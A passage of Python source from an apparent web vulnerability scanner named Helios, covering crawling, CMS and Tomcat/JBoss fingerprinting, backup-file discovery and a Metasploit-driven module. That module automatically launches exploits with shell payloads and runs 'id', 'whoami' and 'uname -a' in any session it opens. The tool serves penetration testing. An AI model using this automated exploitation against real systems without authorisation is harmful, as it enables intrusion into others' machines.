        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if not self.logger.handlers:
            self.logger.addHandler(ch)
        self.logger.debug("Starting script parser")
        self.options = options
        self.log_level = logger
        self.parse_scripts()
        self.writer = database

    def parse_scripts(self):
        self.s = ScriptParser(logger=self.log_level)
        self.s.load_scripts()
        self.scripts_active = []
        self.scripts_fs = []
        self.scripts_passive = []

        for script in self.s.scripts:
            matches = []
            if self.options:
                if 'all' not in self.options:
                    if self.options and 'options' in script:
                        for sub in script['options']:
                            if str(sub) not in self.options:
                                self.logger.debug("Disabling script %s because %s is not enabled" % (script['name'], sub))
                                continue
            else:
                if 'options' in script and 'dangerous' in script['options']:
                    self.logger.debug("Disabling script %s because dangerous flag is present, use --options all or add the dangerous flag to override" % (script['name']))
                    continue

            for x in script['matches']:
                mobj = MatchObject(
                    mtype=x['type'],
                    match=x['match'],
                    location=x['location'],
                    name=x['name'] if 'name' in x else script['name'],
                    options=list(x['options'])
                )
                matches.append(mobj)

            script_data = {
                "name": script['name'],
                "find": script['find'],
                "severity": script['severity'],
                "request": script['request'],
                "data": script['data'] if 'data' in script else {},
                "matches": matches
            }
            if not script['request']:
                if script['run_at'] == "response":
                    self.scripts_passive.append(script_data)
                if script['run_at'] == "fs":
                    self.scripts_fs.append(script_data)

            if script['request']:
                self.scripts_active.append(script_data)

    def run_fs(self, base_url):
        links = []
        if self.can_fs:
            for script in self.scripts_fs:
                if str(script['find']) == "once":
                    if has_seen_before(script['name'], self.results):
                        continue
                data = script['data']
                new_req = CustomRequestBuilder(
                    url=data['url'],
                    data=data['data'] if 'data' in data else None,
                    headers=data['headers'] if 'headers' in data else {},
                    options=data['options'] if 'options' in data else [],
                )
                new_req.root_url = base_url
                result = new_req.run()
                if result:
                    # is found so added to crawler
                    if result.response.code == 200:
                        links.append([urlparse.urljoin(base_url, new_req.url), new_req.data])
                    for match in script['matches']:
                        mresult = match.run(result.response)
                        if mresult:
                            res = "%s [%s] > %s" % (script['name'], result.response.to_string(), mresult)
                            self.logger.info("Discovered: %s" % res)
                            if self.writer:
                                severity = script['severity'] if 'severity' in script else 0
                                text = json.dumps({"request": response_to_dict(result.response), "match": mresult})
                                self.writer.put(result_type="Basic Script - Filesystem", script=script['name'], severity=severity, text=text)
                            self.results.append({"script": script['name'], "match": mresult, "data": response_to_dict(result.response)})
            return links

    def run_scripts(self, request):
        for script in self.scripts_passive:
            if str(script['find']) == "once":
                if has_seen_before(script['name'], self.results):
                    continue
            for match in script['matches']:
                result = match.run(request.response)
                if result:
                    res = "%s [%s] > %s" % (script['name'], request.response.to_string(), result)
                    self.logger.info("Discovered: %s" % res)
                    if self.writer:
                        severity = script['severity'] if 'severity' in script else 0
                        text = json.dumps({"request": response_to_dict(request.response), "match": result})
                        self.writer.put(result_type="Basic Script - Passive", script=script['name'],
                                        severity=severity, text=text, allow_only_once=str(script['find']) == "once")
                    self.results.append(
                        {"script": script['name'], "match": result, "data": response_to_dict(request.response)})
        if self.can_exploit:
            for script in self.scripts_active:
                if str(script['find']) == "once":
                    if has_seen_before(script['name'], self.results):
                        continue
                try:
                    r = RequestBuilder(
                        req=request,
                        inject_type=script['request'],
                        inject_value=script['data']['inject_value'],
                        matchobject=script['matches'],
                        name=script['name']
                    )
                    results = []
                    results = r.run()
                    if results:
                        for scan_result in results:
                            if scan_result not in self.results:
                                res = "[%s] URL %s > %s" % (script['name'], scan_result['request']['request']['url'], scan_result['match'])
                                self.logger.info("Discovered: %s" % res)
                                if self.writer:
                                    severity = script['severity'] if 'severity' in script else 0
                                    text = json.dumps(scan_result)
                                    self.writer.put(result_type="Basic Script - Active", script=script['name'],
                                                    severity=severity, text=text)
                                self.results.append(res)
                except Exception as e:
                    self.logger.warning("Error running script %s: %s" % (script['name'], str(e)))


class ScriptParser:
    directory = '../scripts'
    root_dir = ''
    script_dir = ''
    scripts = []
    logger = None

    def __init__(self, newdir=None, logger=logging.INFO):
        self.root_dir = os.path.dirname(os.path.realpath(__file__))
        self.script_dir = os.path.join(self.root_dir, self.directory) if not newdir else newdir
        self.logger = logging.getLogger("ScriptParser")
        self.logger.setLevel(logger)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logger)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if not self.logger.handlers:
            self.logger.addHandler(ch)
        if not os.path.isdir(self.script_dir):
            self.logger.error("Cannot initialise script engine, directory '%s' does not exist" % self.script_dir)
        self.scripts = []

    def load_scripts(self):
        self.logger.debug("Init script engine")
        for f in os.listdir(self.script_dir):
            script = os.path.join(self.script_dir, f)
            if os.path.isfile(script):
                try:
                    with open(script, 'r') as scriptfile:
                        data = scriptfile.read()
                    jsondata = json.loads(data)
                    self.scripts.append(jsondata)
                except ValueError:
                    self.logger.error("Script %s appears to be invalid JSON, ignoring" % f)
                    pass
                except IOError:
                    self.logger.error("Unable to access script file %s, ignoring" % f)
                    pass
        self.logger.info("Script Engine loaded %d scripts" % len(self.scripts))



# cms-detector.py v0.1 / https://github.com/robwillisinfo/cms-detector.py
# edit by stefan2200
import requests


# because I am too lazy to replace all the if statements
class InvalidRequestObject:
    status_code = 404
    text = ""


class CMSDetector:
    headers = {}
    cookies = {}

    def __init__(self, user_agent=None, headers={}, cookies={}):
        self.headers = headers
        self.cookies = cookies
        if user_agent:
            self.headers['User-Agent'] = user_agent

    def get(self, url):
        try:
            return requests.get(url, allow_redirects=False, headers=self.headers, cookies=self.cookies)
        except:
            return InvalidRequestObject()

    def scan_sub(self, base, path):
        if base.endswith('/'):
            base = base[:-1]
        url = "%s/%s/" % (base, path)
        result = self.get(url)
        # 2xx
        if result.status_code != 404 and "not found" not in result.text.lower():
            return self.scan(url)
        return None

    def scan(self, base):
        if base.endswith('/'):
            base = base[:-1]
        wpLoginCheck = self.get(base + '/wp-login.php')
        if wpLoginCheck.status_code == 200 and "user_login" in wpLoginCheck.text and "404" not in wpLoginCheck.text:
            return "wordpress"
        wpAdminCheck = self.get(base + '/wp-admin')
        if wpAdminCheck.status_code == 200 and "user_login" in wpAdminCheck.text and "404" not in wpLoginCheck.text:
            return "wordpress"
        wpAdminUpgradeCheck = self.get(base + '/wp-admin/upgrade.php')
        if wpAdminUpgradeCheck.status_code == 200 and "404" not in wpAdminUpgradeCheck.text:
            return "wordpress"
        wpAdminReadMeCheck = self.get(base + '/readme.html')
        if wpAdminReadMeCheck.status_code == 200 and "404" not in wpAdminReadMeCheck.text:
            return "wordpress"

        ####################################################
        # Joomla Scans
        ####################################################

        joomlaAdminCheck = self.get(base + '/administrator/')
        if joomlaAdminCheck.status_code == 200 and "mod-login-username" in joomlaAdminCheck.text and "404" not in joomlaAdminCheck.text:
            return "joomla"

        joomlaReadMeCheck = self.get(base + '/readme.txt')
        if joomlaReadMeCheck.status_code == 200 and "joomla" in joomlaReadMeCheck.text and "404" not in joomlaReadMeCheck.text:
            return "joomla"

        joomlaTagCheck = self.get(base)
        if joomlaTagCheck.status_code == 200 and 'name="generator" content="Joomla' in joomlaTagCheck.text and "404" not in joomlaTagCheck.text:
            return "joomla"

        joomlaStringCheck = self.get(base)
        if joomlaStringCheck.status_code == 200 and "joomla" in joomlaStringCheck.text and "404" not in joomlaStringCheck.text:
            return "joomla"

        joomlaDirCheck = self.get(base + '/media/com_joomlaupdate/')
        if joomlaDirCheck.status_code == 403 and "404" not in joomlaDirCheck.text:
            return "joomla"

        ####################################################
        # Magento Scans
        ####################################################

        magentoAdminCheck = self.get(base + '/index.php/admin/')
        if magentoAdminCheck.status_code == 200 and 'login' in magentoAdminCheck.text and 'magento' in magentoAdminCheck.text and "404" not in magentoAdminCheck.text:
            return "magento"

        magentoRelNotesCheck = self.get(base + '/RELEASE_NOTES.txt')
        if magentoRelNotesCheck.status_code == 200 and 'magento' in magentoRelNotesCheck.text:
            return "magento"

        magentoCookieCheck = self.get(base + '/js/mage/cookies.js')
        if magentoCookieCheck.status_code == 200 and "404" not in magentoCookieCheck.text:
            return "magento"

        magStringCheck = self.get(base + '/index.php')
        if magStringCheck.status_code == 200 and '/mage/' in magStringCheck.text or 'magento' in magStringCheck.text:
            return "magento"

        magentoStylesCSSCheck = self.get(base + '/skin/frontend/default/default/css/styles.css')
        if magentoStylesCSSCheck.status_code == 200 and "404" not in magentoStylesCSSCheck.text:
            return "magento"

        mag404Check = self.get(base + '/errors/design.xml')
        if mag404Check.status_code == 200 and "magento" in mag404Check.text:
            return "magento"

        ####################################################
        # Drupal Scans
        ####################################################

        drupalReadMeCheck = self.get(base + '/readme.txt')
        if drupalReadMeCheck.status_code == 200 and 'drupal' in drupalReadMeCheck.text and '404' not in drupalReadMeCheck.text:
            return "drupal"

        drupalTagCheck = self.get(base)
        if drupalTagCheck.status_code == 200 and 'name="Generator" content="Drupal' in drupalTagCheck.text:
            return "drupal"

        drupalCopyrightCheck = self.get(base + '/core/COPYRIGHT.txt')
        if drupalCopyrightCheck.status_code == 200 and 'Drupal' in drupalCopyrightCheck.text and '404' not in drupalCopyrightCheck.text:
            return "drupal"

        drupalReadme2Check = self.get(base + '/modules/README.txt')
        if drupalReadme2Check.status_code == 200 and 'drupal' in drupalReadme2Check.text and '404' not in drupalReadme2Check.text:
            return "drupal"

        drupalStringCheck = self.get(base)
        if drupalStringCheck.status_code == 200 and 'drupal' in drupalStringCheck.text:
            return "drupal"

        return None



try:
    from urlparse import urlparse
except ImportError:
    from urllib.parse import urlparse
import fnmatch


class Scope:
    host = ""
    scopes = []
    is_https = False
    allow_cross_port = False
    allow_cross_schema = True
    allow_subdomains = False
    _port = 0

    def __init__(self, url, options=None):
        parsed = urlparse(url)
        if url.startswith("https://"):
            self.is_https = True
        self.host = parsed.hostname
        self._port = parsed.port
        if options:
            opts = [x.strip() for x in options.split(',')]
            if "cross_port" in opts:
                self.allow_cross_port = True
            if "no_cross_schema" in opts:
                self.allow_cross_schema = False
            if "allow_subdomains" in opts:
                self.allow_subdomains = True
            if "dont_care" in options:
                self.allow_subdomains = True
                self.allow_cross_port = True

    # Checks if a URL is in scope
    def in_scope(self, url):
        parsed = urlparse(url)
        if not self.allow_cross_port and \
                (parsed.port != self._port or
                 self.allow_cross_schema and parsed.port in [80, 443]):
            return False
        if not self.allow_cross_schema:
            if self.is_https and parsed.scheme != "https":
                return False
            if not self.is_https and parsed.scheme != "http":
                return False
        if parsed.hostname == self.host:
            return True
        for sub_scope in self.scopes:
            if "*" in sub_scope:
                return fnmatch.fnmatch(parsed.netloc, sub_scope)
            if sub_scope == parsed.netloc:
                return True
        if self.allow_subdomains and parsed.netloc.endswith(self.host):
            return True
        return False



from concurrent.futures import ThreadPoolExecutor
import time
try:
    from Queue import Queue, Empty
except ImportError:
    from queue import Queue, Empty

class MetaExecutor:
    monster = None
    logger = None
    queue = None
    is_working = True
    port_min = 0
    port_max = 65535
    port_current = 0
    monitor = {

    }
    working = []

    def __init__(self, monster, todo):
        self.monster = monster
        self.logger = self.monster.client.logger
        self.queue = Queue()
        self.port_min = int(self.monster.msf['settings']['shell_port_start'])
        self.port_current = int(self.monster.msf['settings']['shell_port_start'])
        self.port_max = int(self.monster.msf['settings']['shell_port_end'])
        available = self.port_max - self.port_min
        if len(todo) > available:
            self.logger.warning("The number of found exploits %d exceeds the max number of ports: %d")
            self.logger.info("Only using first %d exploits due to listen port limitations" % available)
            todo = todo[0:available-1]

        for entry in todo:
            self.queue.put(entry)

    def threadedExecutor(self, exploit):
        info = self.monster.client.request("module.info", ['exploits', exploit])
        rank = info['rank']

        if str(rank) not in self.monster.msf['settings']['min_success']:
            self.logger.debug("Exploit %s does not meet minimum required exploit rank" % exploit)
            return exploit, None

        if self.monster.msf['settings']['ignore_SRVHOST'] and 'SRVHOST' in info['options']:
            self.logger.debug("Exploit %s requires SRVHOST.. ignoring" % exploit)
            return exploit, None

        if self.monster.msf['settings']['ignore_privileged'] and info['privileged']:
            self.logger.debug("Exploit %s requires credentials (privileged).. ignoring" % exploit)
            return exploit, None

        payloads = self.monster.client.request("module.compatible_payloads", [exploit])['payloads']
        selected_payload = None
        for payload in payloads:
            if self.monster.msf['settings']['shell_type'] in payload:
                selected_payload = payload
                break
        for payload in payloads:
            if not selected_payload:
                if self.monster.msf['settings']['shell_type_fallback'] in payload:
                    selected_payload = payload
                    break
        if not selected_payload:
            self.logger.debug("Exploit %s cannot find good payload" % exploit)
            return exploit, None

        listen_port = self.port_current
        self.port_current += 1
        options = self.parse_options(info['options'])
        options['PAYLOAD'] = selected_payload.strip()
        options['LPORT'] = listen_port
        options['TARGET'] = 0
        options['VERBOSE'] = True
        run_options = ','.join([str(key) + "=" + str(options[key]) for key in options])
        self.logger.debug("Running exploit %s, payload=%s, settings=%s" % (exploit, selected_payload, run_options))
        exec_result = self.monster.client.request("module.execute", ["exploit", "exploit/"+exploit, options])
        if exec_result['job_id']:
            self.monitor[exec_result['job_id']] = exploit
            self.logger.debug("Started exploit %s" % exploit)
            time.sleep(5)
        else:
            self.logger.debug("Error starting exploit exploit %s" % exploit)

    def parse_options(self, options):
        params = self.monster.msf['parameters']
        opt_set = {}
        for option in options:
            if option in params:
                opt_set[option.strip()] = params[option]
            if options[option]['required'] and not option in params:
                if 'default' in options[option]:
                    opt_set[option] = options[option]['default']
                else:
                    self.logger.warning("%s is not set, setting to empty value" % option)
                    opt_set[option] = ""
        return opt_set

    def parse_and_close(self, session_id, session_data):
        exploit = session_data['via_exploit']
        self.logger.info("%s appears to have worked and has created a session" % exploit)
        if not self.monster.msf['settings']['gather_basic_info']:
            self.working.append([exploit, {}])
            self.monster.client.request("session.stop", [session_id])
            return
        else:
            if session_data['type'] == "shell":
                outputs = {}
                res = self.monster.client.request("session.shell_write", [session_id, 'id\n'])
                outputs['id'] = self.monster.client.request("session.shell_read", [session_id])
                self.monster.client.request("session.shell_write", [session_id, 'whoami\n'])
                outputs['whoami'] = self.monster.client.request("session.shell_read", [session_id])
                self.monster.client.request("session.shell_write", [session_id, 'uname -a\n'])
                outputs['uname'] = self.monster.client.request("session.shell_read", [session_id])
                self.working.append([exploit, outputs])
        self.monster.client.request("session.stop", [session_id])

    def check_monitor(self):
        results = self.monster.client.request("session.list", [])
        if(len(results)):
            for session in results:
                self.parse_and_close(session, results[session])

    def kill_all(self):
        for job_id in self.monster.client.request("job.list"):
            self.monster.client.request("job.stop", [job_id])

    def start(self):

        while(self.is_working):
            if self.queue.empty():
                self.logger.info("All modules started, waiting 10 seconds")
                time.sleep(10)
                self.check_monitor()
                self.kill_all()
                return self.working

            u = self.queue.get()
            self.threadedExecutor(u)
            self.check_monitor()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time
import requests

from helios.core.scripts import *
from helios.core.request import Request
from helios.core.login import LoginAction
from helios.core.crawler import Crawler, WebFinder
from helios.core.utils import uniquinize
from helios.core.database import SQLiteWriter
from helios.core.webapps import WebAppModuleLoader
from helios.ext.mefjus.ghost import Mefjus
from helios.core.scope import Scope
from helios.core import scanner, modules
from helios.ext.libcms.cms_scanner_core import CustomModuleLoader
from helios.ext.metamonster import metamonster

try:
    import urlparse
except ImportError:
    # python 3 imports
    import urllib.parse as urlparse


class Helios:
    logger = None
    crawler_max_urls = 200
    output_file = None
    _max_safe_threads = 25
    thread_count = 10

    proxy_port = 3333
    driver_show = False

    use_proxy = True
    db = None
    scan_cookies = {}
    options = None

    def __init__(self, options):
        self.options = options

    def start(self):
        self.logger = logging.getLogger("Helios")
        self.logger.setLevel(logging.DEBUG if self.options.verbose else logging.INFO)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logging.DEBUG if self.options.verbose else logging.INFO)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if not self.logger.handlers:
            self.logger.addHandler(ch)
        self.logger.info("Starting Helios")

        try:
            self.thread_count = int(self.options.threads)
        except:
            # None or invalid format
            pass
        if self.thread_count > self._max_safe_threads:
            self.logger.warning("Number of threads %d is too high, defaulting to %d" %
                                (self.thread_count, self._max_safe_threads))
            self.thread_count = self._max_safe_threads
        if not self.options.sslverify:
            requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
            self.logger.info("Disabled SSL verification")

        self.db = SQLiteWriter()
        self.db.open_db(self.options.db)
        self.logger.info("Using SQLite database %s" % self.options.db)

    def run(self, start_urls, scopes=None):
        start_url = start_urls[0]
        self.start()
        start_time = time.time()
        scope = Scope(start_url, options=self.options.scope_options)
        if scopes:
            scope.scopes = [x.strip() for x in scopes.split(',')]
        self.db.start(start_url, scope.host)
        c = None
        s = None
        loader = None

        self.logger.debug("Parsing scan options")
        login = LoginAction(logger=self.logger.getEffectiveLevel())
        pre_run = login.pre_parse(self.options)
        if pre_run:
            self.scan_cookies = dict(login.session_obj.cookies)
        scanoptions = []
        if self.options.custom_options:
            scan_vars = self.options.custom_options.split(',')
            for v in scan_vars:
                opt = v.strip()
                scanoptions.append(opt)
                self.logger.debug("Enabled option %s" % opt)
        if self.options.scanner or self.options.allin:
            s = ScriptEngine(options=scanoptions, logger=self.logger.getEffectiveLevel(), database=self.db)

        if self.options.use_adv_scripts or self.options.allin:
            loader = modules.CustomModuleLoader(options=scanoptions,
                                                logger=self.logger.getEffectiveLevel(),
                                                database=self.db,
                                                scope=scope)

            loader.sslverify = self.options.sslverify
            loader.headers = login.headers
            loader.cookies = self.scan_cookies

        todo = []

        c = Crawler(base_url=start_url, logger=self.logger.getEffectiveLevel())
        for login_header in login.headers:
            c.headers[login_header] = login.headers[login_header]
        if self.options.use_crawler or self.options.allin:
            if pre_run:
                c.login = True
                # set cookies from Login module
                cookies = dict(login.session_obj.cookies)
                if cookies and len(cookies):
                    self.logger.debug("Setting crawler cookies from login module: %s" % str(cookies))
                    c.cookie.append(cookies)
            c.thread_count = self.thread_count
            c.max_urls = int(self.options.maxurls)
            c.scope = scope
            if self.options.user_agent:
                c.headers = {'User-Agent': self.options.user_agent}
            if len(start_urls) != 1:
                for extra_url in start_urls[1:]:
                    c.parse_url(extra_url, extra_url)
            # discovery scripts, pre-run scripts and advanced modules
            if self.options.scanner or self.options.allin:
                self.logger.info("Starting filesystem discovery (pre-crawler)")
                new_links = s.run_fs(start_url)

                for newlink in new_links:
                    c.parse_url(newlink[0], newlink[0])
                if self.options.use_adv_scripts or self.options.allin:
                    self.logger.info("Running custom scripts (pre-crawler)")
                    links = loader.base_crawler(start_url)
                    for link in links:
                        self.logger.debug("Adding link %s from post scripts" % link)
                        c.parse_url(link, link)

            if self.options.wl_file or self.options.allin:
                wf = WebFinder(url=start_url,
                               logger=self.logger.getEffectiveLevel(),
                               word_list=self.options.wl_file,
                               append=self.options.wl_ext,
                               ok_status_codes=self.options.wl_codes,
                               invalid_text=self.options.wl_404,
                               threads=self.thread_count)
                for wf_result in wf.output:
                    c.parse_url(wf_result, start_url)

            self.logger.info("Starting Crawler")
            c.run_scraper()
            self.logger.debug("Cookies set during scan: %s" % (str(c.cookie.cookies)))
            self.scan_cookies = c.cookie.cookies

            self.logger.info("Creating unique link/post data list")
            todo = uniquinize(c.scraped_pages)
        else:
            todo = [[start_url, None]]

        if self.options.driver:
            self.logger.info("Running GhostDriver")

            m = Mefjus(logger=self.logger.getEffectiveLevel(),
                       driver_path=self.options.driver_path,
                       use_proxy=self.options.proxy,
                       proxy_port=self.options.proxy_port,
                       use_https=scope.is_https,
                       show_driver=self.options.show_driver or self.options.interactive)
            results = m.run(todo, interactive=self.options.interactive)
            for res in results:
                if not scope.in_scope(res[0]):
                    self.logger.debug("IGNORE %s.. out-of-scope" % res)
                    continue
                if c.get_filetype(res[0]) in c.blocked_filetypes:
                    self.logger.debug("IGNORE %s.. bad file-type" % res)
                    continue
                if res in c.scraped_pages:
                    self.logger.debug("IGNORE %s.. exists" % res)
                    continue
                else:
                    todo.append(res)
                    self.logger.debug("QUEUE %s" % res)
            self.logger.info("Creating unique link/post data list")
            old_num = len(todo)
            todo = uniquinize(todo)
            self.logger.debug("WebDriver discovered %d more url/post data pairs" % (len(todo) - old_num))

        scanner_obj = None
        if self.options.scanner or self.options.allin:
            self.logger.info("Starting scan sequence")
            if len(todo) < self.thread_count:
                # for performance sake
                self.thread_count = len(todo)
            scanner_obj = scanner.Scanner(logger=self.logger.getEffectiveLevel(),
                                          script_engine=s, thread_count=self.thread_count)
            scanner_obj.copy_engine = self.options.optimize
            for page in todo:
                url, data = page
                req = Request(url, data=data, agent=self.options.user_agent,
                              headers=login.headers, cookies=self.scan_cookies)
                req.run()
                scanner_obj.queue.put(req)
                scanner_obj.logger.debug("Queued %s %s" % (url, data))
            scanner_obj.run()

        post_results = []
        if self.options.use_adv_scripts or self.options.allin:
            self.logger.info("Running post scripts")
            post_results = loader.run_post(todo, cookies=self.scan_cookies)
        cms_results = None
        if self.options.cms_enabled or self.options.allin:
            cms_loader = CustomModuleLoader(log_level=self.logger.getEffectiveLevel())
            cms_results = cms_loader.run_scripts(start_url)
            if cms_results:
                for cms in cms_results:
                    for cms_result in cms_results[cms]:
                        self.db.put(result_type="CMS Script", script=cms,
                                    severity=0, text=cms_result)

        webapp_results = None
        if self.options.webapp_enabled or self.options.allin:
            webapp_loader = WebAppModuleLoader(log_level=self.logger.getEffectiveLevel())
            webapp_loader.load_modules()
            webapp_results = webapp_loader.run_scripts(start_url, scope=scope,
                                                       cookies=self.scan_cookies, headers=login.headers)
            if webapp_results:
                for webapp in webapp_results:
                    for webapp_result in webapp_results[webapp]:
                        self.db.put(result_type="WebApp Script", script=webapp,
                                    severity=0, text=json.dumps(webapp_result))
        meta = {}
        if self.options.msf:
            monster = metamonster.MetaMonster(log_level=self.logger.getEffectiveLevel())
            creds = self.options.msf_creds.split(':')
            monster.username = creds[0]
            monster.password = creds[1]
            monster.host = self.options.msf_host
            monster.port = self.options.msf_port
            monster.ssl = self.options.msf_ssl
            monster.endpoint = self.options.msf_uri
            monster.should_start = self.options.msf_autostart

            monster.connect(start_url)
            if monster.client and monster.client.is_working:
                monster.get_exploits()
                monster.detect()
                queries = monster.create_queries()
                monster.run_queries(queries)
                meta = monster.results
                for working in meta['working']:
                    msf_module, msf_output = working
                    self.db.put(result_type="Metasploit", script=msf_module,
                                severity=3, text=json.dumps(msf_output))

        scan_tree = {
            'start': start_time,
            'end': time.time(),
            'scope': scope.host,
            'starturl': start_url,
            'crawled': len(c.scraped_pages) if c else 0,
            'scanned': len(todo) if self.options.scanner else 0,
            'results': scanner_obj.script_engine.results if scanner_obj else [],
            'metasploit': meta,
            'cms': cms_results,
            'webapps': webapp_results,
            'post': post_results if self.options.use_adv_scripts else []
        }

        self.db.end()

        if self.options.outfile:
            with open(self.options.outfile, 'w') as f:
                f.write(json.dumps(scan_tree))
                self.logger.info("Wrote results to %s" % self.options.outfile)






import os
import requests
try:
    import urlparse
except ImportError:
    import urllib.parse as urlparse
import helios.modules.module_base
from helios.core.utils import requests_response_to_dict, random_string


class Module(helios.modules.module_base.Base):

    def __init__(self):
        self.name = "Backup Files"
        self.input = "urls"
        self.injections = {}
        self.module_types = ['discovery']
        self.possibilities = [
            '{url}{extension}~',
            '{url}{extension}.bak',
            '{url}.bak',
            '{url}.backup',
            '{url}.inc',
            '{url}.old',
            '{url}.zip',
            '{url}.txt'
        ]
        self.output = "vulns"
        self.severity = 2

    def run(self, urls, headers={}, cookies={}):
        results = []
        self.cookies = cookies
        self.headers = headers
        list_urls = []
        for u in urls:
            if u[0].split('?')[0] not in list_urls:
                list_urls.append(u[0].split('?')[0])

        for f in list_urls:
            working = 0
            ffurl = "%s.%s" % (f, random_string())
            result_fp = self.send(ffurl, self.headers, self.cookies)
            if result_fp and result_fp.url == ffurl and result_fp.status_code == 200:
                # site responds 200 to random extension, ignore the URL
                continue

            for p in self.possibilities:
                if working > 3:
                    # if something is creating false positives
                    continue
                path = urlparse.urlparse(f).path
                base, ext = os.path.splitext(path)
                u = urlparse.urljoin(f, base)
                p = p.replace('{url}', u)
                p = p.replace('{extension}', ext)
                result = self.send(p, self.headers, self.cookies)
                if result and result.url == p and result.status_code == 200:
                    if "Content-Type" not in result.headers or result.headers['Content-Type'] != "text/html":
                        working += 1
                        results.append({'request': requests_response_to_dict(result), "match": "Status code 200"})
        return results

    def send(self, url, params, data):
        result = None
        headers = self.headers
        cookies = self.cookies
        try:
            if data:
                result = requests.post(url, params=params, data=data, headers=headers, cookies=cookies)
            else:
                result = requests.get(url, params=params, headers=headers, cookies=cookies)
        except Exception as e:
           pass
        return result



import os
import logging
import sys


class WebAppModuleLoader:
    folder = ""
    blacklist = ['base_app.py', '__init__.py']
    modules = []
    logger = None
    is_aggressive = False
    module = None

    def __init__(self, folder='../webapp', blacklist=[], is_aggressive=False, log_level=logging.INFO):
        folder = os.path.join(os.path.dirname(__file__), '..', 'webapp')
        self.blacklist.extend(blacklist)
        self.folder = os.path.join(os.path.dirname(__file__), folder)
        self.logger = logging.getLogger("Web App Scanner")
        self.logger.setLevel(log_level)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(log_level)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        self.logger.addHandler(ch)
        self.logger.debug("Loading WebApp scripts from %s" % self.folder )
        self.is_aggressive = is_aggressive

    def load(self, script):
        sys.path.insert(0, os.path.dirname(__file__))
        base = script.replace('.py', '')
        try:
            command_module = __import__("helios.webapp.%s" % base, fromlist=["helios.webapp"])
            module = command_module.Scanner()
            module.logger = self.logger
            module.logger.setLevel(self.logger.getEffectiveLevel())
            self.modules.append(module)

        except ImportError as e:
            self.logger.warning("Error importing script:%s %s" % (base, str(e)))
        except Exception as e:
            self.logger.warning("Error loading script:%s %s" % (base, str(e)))

    def load_modules(self):
        for f in os.listdir(self.folder):
            if not f.endswith('.py'):
                continue
            if f in self.blacklist:
                continue
            self.load(f)

    def run_scripts(self, base, headers={}, cookies={}, scope=None):
        results = {}
        for module in self.modules:
            module.cookies = cookies
            module.scope = scope
            module.run(base)
            results[module.name] = module.results
        return results



from helios.webapp import base_app
import re
import random
import json


# This script detects vulnerabilities in the following Java based products:
# - Tomcat
# - JBoss
class Scanner(base_app.BaseAPP):

    def __init__(self):
        self.name = "Tomcat"
        self.types = []

    def detect(self, url):
        result = self.send(url)
        if not result:
            return False

        rand_val = random.randint(9999, 999999)
        invalid_url = url + "a_%d.jsp" % rand_val if url.endswith('/') else url + "/a_%d.jsp" % rand_val
        invalid_result = self.send(invalid_url)
        if invalid_result and 'Tomcat' in invalid_result.text:
            self.logger.debug("Discovered Tomcat through 404 page")
            return True

        if 'Server' in result.headers:
            if 'Tomcat' in result.headers['Server']:
                self.logger.debug("Discovered Tomcat through Server header")
                return True
            if 'Coyote' in result.headers['Server']:
                self.logger.debug("Discovered Coyote through Server header")
                return True
            if 'JBoss' in result.headers['Server']:
                self.logger.debug("Discovered JBoss through Server header")
                return True
            if 'Servlet' in result.headers['Server']:
                self.logger.debug("Discovered Servlet through Server header")
                return True

        text = result.text

        for link in re.findall('<a.+?href="(.+?)"', text):
            linkdata = link.split('?')[0]
            if linkdata and len(linkdata):
                if not linkdata.startswith('http'):
                    if linkdata.endswith('.do'):
                        self.logger.debug("Discovered Java based app (links end with .do)")
                        return True
                    if linkdata.endswith('.jsp'):
                        self.logger.debug("Discovered Tomcat based app (links end with .jsp)")
                        return True

    def test(self, url):
        db = self.get_db("tomcat_vulns.json")
        data = json.loads(db)

        version_tomcat = self.get_version_tomcat(url)
        if version_tomcat:
            self.logger.info("Tomcat version %s was identified on URL %s" % (version_tomcat, url))
            tomcat_vulns = data['Tomcat']
            self.match_versions(tomcat_vulns, version_tomcat, url)

        version_jboss = self.get_version_jboss(url)
        if version_jboss:
            self.logger.info("Jboss version %s was identified on URL %s" % (version_jboss, url))
            jboss_vulns = data['Jboss']
            self.match_versions(jboss_vulns, version_jboss, url)

    def get_version_tomcat(self, url):
        rand_val = random.randint(9999, 999999)
        invalid_url = url + "a_%d.jsp" % rand_val if url.endswith('/') else url + "/a_%d.jsp" % rand_val
        invalid_result = self.send(invalid_url)
        if 'Tomcat' in invalid_result.text:
            version = re.search('<h3>Apache Tomcat/(.+?)</h3>', invalid_result.text)
            if version:
                return version.group(1)
        return False

    def get_version_jboss(self, url):
        rand_val = random.randint(9999, 999999)
        invalid_url = url + "a_%d.jsp" % rand_val if url.endswith('/') else url + "/a_%d.jsp" % rand_val
        invalid_result = self.send(invalid_url)
        if 'JBoss' in invalid_result.text:
            version = re.search('<h3>JBoss(?:Web)?/(.+?)</h3>', invalid_result.text)
            if version:
                return version.group(1)
        return False





import requests


class PassiveDetector:
    url = None
    linux_types = ['debian', 'ubuntu', 'centos', 'fedora', 'red hat']

    def __init__(self, url):
        self.url = url

    def get_page(self):
        result = requests.get(self.url, verify=False)
        return result

    def detect(self, result):
        tech = []
        os = None
        if 'wp-content' in result.text:
            tech.append('wordpress')
            tech.append('php')

        if 'content="drupa' in result.text.lower():
            tech.append('drupal')
            tech.append('php')

        if 'Server' in result.headers:
            for linux_type in self.linux_types:
                if linux_type in result.headers['Server'].lower():
                    os = "linux"

            if 'apache' in result.headers['Server'].lower():
                tech.append('apache')
                if 'win' in result.headers['Server'].lower():
                    os = "windows"

            if 'iis' in result.headers['Server'].lower():
                tech.append('iis')
                os = "windows"

            if 'nginx' in result.headers['Server'].lower():
                tech.append('nginx')

            if 'tomcat' in result.headers['Server'].lower():
                tech.append('tomcat')

            if 'jboss' in result.headers['Server'].lower():
                tech.append('jboss')
        return os, tech

